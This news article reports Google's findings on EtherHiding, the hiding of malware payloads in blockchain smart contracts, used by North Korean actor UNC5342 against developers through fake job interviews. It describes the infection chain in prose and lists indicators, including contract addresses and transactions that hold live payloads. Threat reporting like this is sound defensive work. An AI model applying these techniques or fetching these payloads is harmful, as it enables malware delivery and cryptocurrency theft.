The cybersecurity landscape has witnessed a significant evolution in attack techniques with North Korean threat actors adopting EtherHiding, a sophisticated method that leverages blockchain technology to distribute malware and facilitate cryptocurrency theft.
EtherHiding represents a fundamental shift in how cybercriminals store and deliver malicious payloads by embedding malware code within smart contracts on public blockchains like BNB Smart Chain and Ethereum.
This technique essentially transforms the blockchain into a decentralized command-and-control server that offers unprecedented resilience against traditional takedown efforts and blocklisting measures.
Google Threat Intelligence Group (GTIG) has identified the North Korea-linked threat actor UNC5342 as the first nation-state group observed using this innovative technique, marking a concerning advancement in state-sponsored cyber operations.
The method first emerged in September 2023 during the financially motivated CLEARFAKE campaign conducted by threat cluster UNC5142, which used deceptive overlays such as fake browser update prompts to manipulate victims into executing malicious code.
The attack chain begins when North Korean threat actors compromise legitimate websites through vulnerabilities or stolen credentials, then inject a small JavaScript loader script into the compromised site.
When unsuspecting users visit the infected website, the loader script executes in their browser and communicates with the blockchain to retrieve the main malicious payload stored remotely.
A critical feature of this retrieval process involves using read-only function calls that avoid creating blockchain transactions, ensuring the malware retrieval remains stealthy while bypassing gas fees.
The Strategic Advantages for Attackers
EtherHiding provides attackers with several compelling advantages that make this technique particularly difficult to counter.
The decentralized nature of blockchain means there is no central server that law enforcement or cybersecurity firms can take down, with malicious code remaining accessible as long as the blockchain itself operates.
The pseudonymous nature of blockchain transactions makes tracing attacker identities extremely challenging, while the immutability of smart contracts means deployed malicious code typically cannot be removed or altered except by the contract owner.
Perhaps most concerning is the flexibility this technique affords attackers. By controlling the smart contract, threat actors can update malicious payloads at any time, allowing them to change attack methods, update domains, or deploy different malware types simultaneously by simply updating the smart contract.
Additionally, attackers can retrieve payloads using read-only calls that leave no visible transaction history on the blockchain, making their activities significantly harder to track.
This combination of features represents a shift toward next-generation bulletproof hosting, where blockchain’s inherent features are repurposed for malicious ends.
Since February 2025, GTIG has tracked UNC5342 incorporating EtherHiding into an ongoing social engineering campaign dubbed Contagious Interview by Palo Alto Networks.
This sophisticated operation targets developers, particularly in the cryptocurrency and technology sectors, through an elaborate fake recruitment process that cleverly exploits job application procedures.
The campaign serves dual purposes aligned with North Korea’s strategic objectives: generating revenue through cryptocurrency theft to bypass international sanctions, and conducting espionage by compromising developers to gather intelligence and gain footholds in technology companies.
The attack begins with fake recruiters creating convincing profiles on professional networking sites like LinkedIn, often impersonating representatives from well-known tech or cryptocurrency firms.
In some instances, attackers have established completely fabricated companies with fake websites and social media presences for entities like BlockNovas LLC, Angeloper Agency, and SoftGlideLLC.
Once initial contact is made, victims are moved to platforms like Telegram or Discord for the fake interview process.
The core of the attack occurs during a technical assessment phase where candidates are asked to download files from repositories like GitHub for coding tests or project reviews.
These files contain malicious code that initiates a multi-stage infection process. The campaign employs JADESNOW malware as an initial downloader, which then deploys a JavaScript variant of INVISIBLEFERRET.
This second-stage malware is designed to scan for and exfiltrate sensitive data, particularly targeting cryptocurrency wallets, browser extension data, and credentials.
For high-value targets, the persistent INVISIBLEFERRET backdoor provides attackers with remote control over compromised systems, enabling long-term espionage, data theft, and lateral movement within networks.
JADESNOW and Blockchain Infrastructure
JADESNOW is a JavaScript-based downloader malware family specifically associated with UNC5342 that utilizes EtherHiding to fetch, decrypt, and execute malicious payloads from smart contracts on BNB Smart Chain and Ethereum.
The initial downloader queries the BNB Smart Chain through various API providers, including Binplorer, to read the JADESNOW payload stored in smart contracts.
Analysis of one particular smart contract revealed it had been updated over 20 times within the first four months, with each update costing an average of just $1.37 USD in gas fees. This low cost and high frequency of updates illustrates the attacker’s ability to easily modify campaign configurations.
What makes UNC5342’s implementation particularly notable is the use of multiple blockchains within the same operation.
While the initial JADESNOW downloader queries BNB Smart Chain, the obfuscated payload pivots to Ethereum by performing GET requests to query transaction history of attacker-controlled addresses.
Rather than using an Ethereum smart contract to store the payload directly, attackers read calldata stored from transactions made to the well-known burn address, effectively using the blockchain transaction as a Dead Drop Resolver.
These transactions are generated frequently, showing how easily the campaign can be updated with a simple blockchain transaction, including changing the C2 server.
Despite the decentralized nature of blockchain networks, both UNC5342 and UNC5142 rely on centralized services to interact with the blockchain, creating potential points of intervention for defenders.
Neither threat actor interacts directly with BNB Smart Chain when retrieving information from smart contracts; instead, they utilize centralized API services similar to traditional Web2 services.
UNC5142 uses RPC endpoints for direct communication with BNB Smart Chain nodes, while UNC5342 employs API services hosted by central entities that act as abstraction layers between the threat actor and the blockchain.
Defense Strategies and Recommendations
Traditional campaign mitigation strategies that rely on blocking known domains and IPs prove insufficient against EtherHiding, as smart contracts operate autonomously and cannot be shut down through conventional means.
While blockchain scanners like BscScan and Etherscan allow security researchers to tag contracts as malicious, malicious activity can still be performed once the contract is deployed.
Chrome Enterprise offers a centralized mitigation approach by using Chrome Browser Cloud Management to configure and enforce security policies across all managed browsers in an organization.
Key prevention policies include implementing DownloadRestrictions to block dangerous file types like .exe, .msi, .bat, and .dll, preventing malicious payloads from being saved to users’ computers.
Organizations should also leverage managed updates that push Chrome updates silently and automatically in the background, undermining the social engineering tactic of fake update prompts.
Additionally, URLBlocklist policies can block access to known malicious websites or blockchain node URLs identified by threat intelligence, while enforcing Google’s Safe Browsing in enhanced mode provides real-time threat intelligence to warn users about phishing sites and malicious downloads.
The emergence of nation-state actors like UNC5342 adopting EtherHiding demonstrates the continuous evolution of cyber threats as attackers adapt and leverage emerging technologies for malicious purposes.
Indicators of Compromise (IOCs)
| Type | Indicator | Context |
|---|---|---|
| SHA256 Hash (ZIP Archive) | 970307708071c01d32ef542a49099571852846a980d6e8eb164d2578147a1628 | ZIP archive containing the initial downloader, in this case JADESNOW. |
| SHA256 Hash (Initial JavaScript Downloader) | 01fd153bfb4be440dd46cea7bebe8eb61b1897596523f6f6d1a507a708b17cc7 | JADESNOW sample to launch infection chain. |
| BSC Address (Smart Contract) | 0x8eac3198dd72f3e07108c4c7cff43108ad48a71c | BNB Smart Chain contract used by UNC5342 to host the second-stage JADESNOW payload. |
| BSC Address (Attacker-Controlled) | 0x9bc1355344b54dedf3e44296916ed15653844509 | Owner address of the malicious BNB Smart Chain contract. |
| Ethereum Transaction Hash (INVISIBLEFERRET.JAVASCRIPT Payload) | 0x86d1a21fd151e344ccc0778fd018c281db9d40b6ccd4bdd3588cb40fade1a33a | Transaction storing the INVISIBLEFERRET.JAVASCRIPT payload. |
| Ethereum Transaction Hash (INVISIBLEFERRET.JAVASCRIPT Split Payload) | 0xc2da361c40279a4f2f84448791377652f2bf41f06d18f19941a96c720228cd0f | Transaction storing the split INVISIBLEFERRET.JAVASCRIPT payload. |
| Ethereum Transaction Hash (INVISIBLEFERRET Credential Stealer Payload) | 0xf9d432745ea15dbc00ff319417af3763f72fcf8a4debedbfceeef4246847ce41 | Transaction storing the additional INVISIBLEFERRET.JAVASCRIPT credential stealer payload. |
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
